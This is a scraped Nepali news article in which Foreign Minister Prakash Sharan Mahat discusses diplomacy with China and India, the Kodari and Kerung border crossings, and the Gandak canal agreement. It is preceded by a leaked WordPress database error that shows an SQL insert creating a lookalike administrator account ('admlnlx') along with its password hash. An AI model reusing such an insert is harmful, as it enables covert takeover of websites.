WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BUFbWUUE17thXHRQKBRiqmEY2KG3Vv/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 02:53:28', '', 'admlnlx', 'admlnlx')
चितवन, माघ ७–
परराष्ट्र मन्त्री डा. प्रकाशशरण महतले कूटनीतिक सम्बन्ध सडकमा उठाएर नहुने भन्दै दुई देशबीच टेबलमा बसेर सल्टाउनु पर्ने बताउनुभएको छ ।
आज पत्रकारहरुसँग कुराकानी गर्दै उहाँले सडकमा गालीगलौज गरेर कूटनीतिक सम्बन्ध सुध्रिने होइन, बिग्रिने बताउनुभयो । उहाँले भन्नुभयो “समर्थन र विरोध सडकमा गरेर कूटनीति चल्दैन ।”
छिमेकी देश चीन र भारतसँग कुटनीतिक सम्बन्ध सुमधुर हुँदै गएको भन्दै उहाँले खुल्ला सीमा, डुबान समस्यालगायतका कारण भारतसँग जति समस्या छन् चीनसँग नरहेको बताउनुभयो । जहाँ बढी समस्या छ, त्यहाँ बढी छलफल हुने भएकाले भारतसँग नजिकजस्तो देखिए पनि दुवै देशसँगको सम्बन्ध समदुरीको रहेको उहाँको भनाई थियो ।
चीनतर्फको कोदारी नाका खोल्न चीन सरकार तयार रहेको भन्दै उहाँले केरुङलाई विस्तार गर्ने विषयमा पनि छलफल भइरहेको बताउनुभयो ।
चिनियाँ राष्ट्रपतिको नेपाल भ्रमणको तयारीका लागि छलफल गर्न सचिवस्तरीय संयन्त्रलाई पत्र लेखिसकिएको पनि उहाँले बताउनुभयो ।
परराष्ट्रमन्त्री महतले गण्डक सम्झौता कार्यान्वयनका लागि दुई देशका बीचमा सहमति भइसकेको बताउनुभयो । उहाँले माघ महिनाभित्र नेपाली पक्षले डिपिआर तयार गरी नहरको पुनःसंरचना निर्माण भारतीय पक्षले गर्ने सम्झौता भएको बताउनुभयो । सो नहरबाट सम्झौताबमोजिम ४० हजार हेक्टर जमिन सिँचाई हुनुपर्नेमा २५ हजार हेक्टर मात्रै हुँदै आएको उहाँले बताउनुभयो ।